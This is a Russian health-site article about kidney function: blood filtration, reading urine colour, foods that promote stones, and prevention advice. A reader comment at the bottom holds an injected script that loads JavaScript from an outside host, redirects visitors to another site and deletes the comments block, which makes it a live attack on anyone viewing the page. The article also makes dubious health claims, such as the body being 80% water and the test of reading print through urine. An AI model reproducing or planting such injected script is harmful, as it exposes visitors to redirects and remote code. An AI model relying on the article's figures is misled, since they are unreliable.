Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Почки. Для чего они нужны...  >>  Почки. Для чего они нужны человеку.
 
Обратная связь
 

Почки. Для чего они нужны человеку.

Размер шрифта
10 марта 2011 00:01
  • google_analytics: false
  • Нравится

Организм человека на 80% состоит из воды. Почки тот орган, который контролирует, чтобы объем жидкости сильно не опускался ниже этой цифры и не поднимался выше нее. Ведь переизбыток воды также вреден, как и ее дефицит.

Фильтрация

Когда количество воды в организме повышается, появляется риск возникновения отеков, при которых в организм легко попадают и развиваются инфекции. Поэтому, чтобы избежать застоев жидкости, здоровые почки достаточно оперативно выводят ее излишки c мочой. Когда же количество влаги в организме падает, почки очень бережно относятся к ее расходованию, берегут буквально каждую каплю, и мы реже ходим в туалет.

Кроме контроля над количеством жидкости, почки постоянно очищают кровь, прогоняя ее через себя, как через фильтр. За 5 минут через почки проходит вся кровь, которая есть у нас в организме. Процесс фильтрации идет непрерывно и за сутки они пропускают через себя 180 литров крови, выводя с мочой не менее литра различного «мусора».

Кровь нуждается в постоянном очищении: ведь она не только разносит по организму питательные вещества, но и забирает из клеток «отходы их производства». Соответственно, если не чистить кровь как можно чаще, в ней скоро может накопиться множество вредных веществ, которые начнут отравлять нас изнутри.

Процесс очищения и контроля за расходованием влаги проходит одновременно: сначала через хитрую систему фильтрации почки вынимают из крови всю жидкость с вредными веществами, растворенными в ней, удаляют последние и возвращает в кровь то количество чистой воды, которое нужно ей нужно. Ни больше, ни меньше. Если после этого остались излишки жидкости – они выводятся вместе с отходами фильтрации. Когда воды в организме мало, то почки не экономят на крови, возвращая в нее максимум влаги. И выводя только то количество, которое нужно для эвакуации «мусора» (в «сухом» виде моча не может покинуть организм). Когда влага в дефиците – велик риск, что «выльется не все», то есть некоторые частички отходов останутся в недрах почек, в дальнейшем образуя камни. Именно поэтому врачи и советуют выпивать не менее 2-х литров воды в день – это оптимальное количество, его хватает и на «наполнение» крови и на ликвидацию всего ненужного.

Цветотерапия

Работа почек так же важна для нашего организма, как труд сердца. А возможно и больше. Недаром же «пламенный мотор» у нас один. А почек – 2 штуки. Однако их количество еще не говорит о том, что можно расслабиться. От заболеваний почек не застрахован никто. Поэтому следить за ними нужно очень бережно. Но обследовать самостоятельно напрямую их не получится: их защищают подкожный жир и мышцы. Поэтому внимательно осматривать стоит то, что непосредственно «вышло» из них. То есть мочу. Ведь ее цвет может рассказать очень о многом:

  • Когда почки справляются со своей работой, то моча слегка желтая и прозрачная настолько, что через нее буквально можно читать газету. Не брезгуйте, налейте «продукт жизнедеятельности» в прозрачный сосуд и посмотрите сквозь него на любой текст. Если вы видите все буквы – значит бояться не о чем. Ваши почки работает без сбоев.
  • Когда моча мутная и концентрированная (читать через нее сложно), но при этом желтого цвета – пейте больше жидкости, ваш организм на грани обезвоживания и вскоре почкам не будет хватать жидкости для полноценного вывода «мусора». А с этого начинается множество болезней почек, например, мочекаменная болезнь.
  • Коричневый цвет мочи не говорит ни о чем хорошем. Он свидетельствует, что появились какие-то проблемы. Необходимо, обратиться к врачу и сдать анализы.
  • Если в моче присутствует кровь – это тоже тревожный признак. Симптом того, что где-то в мочевыделительной системе началось воспаление – а оно может быть связанно с массой неприятных болезней от камней до рака.

Также о нездоровье почек могут сказать боли в области поясницы. Многие путают их с симптомами остеохондроза. Чтобы понять, что точно явилось причиной, вспомните, как именно вас «мучает боль»: если она сосредоточена в центре спины, в районе позвоночника – это проявление остеохондроза, если же она проявляется по бокам – стоит проверить почки на камни.

Профилактика

Среди продуктов питания существуют те, что могут провоцировать образование камней в почках. И это не только жирное или мясо. В список врагов вошли и безобидные на первый взгляд растения:
  • шпинат
  • щавель
  • свекла
  • черный чай

Болезни почек нельзя лечить без помощи врача. Самолечение в этом случае может иметь самые печальные последствия. Помощь врача – индивидуальна, она зависит от результатов анализов. Предупредить недуги почек однозначно легче, чем потом лечить их. И меры профилактики просты и общедоступны:

  1. Питайтесь сбалансированно. Ешьте меньше жирного, жареного, острого и соленого. Старайтесь не переедать. Почки будут благодарны за овощи, фрукты, свежую, сочную зелень, морскую рыбу, сладкий перец, яблоки, капусту, арбузы и дыни.
  2. Пейте не менее двух литров чистой воды в сутки (не газированной).
  3. Не допускайте переохлаждения поясницы. Почки боятся холода.
  4. Больше двигайтесь, спортивные упражнения, особенно те, что затрагивают область талии и бедер – полезны для работы почек.
  5. Если позволяет здоровье – закаливайтесь.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:17

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.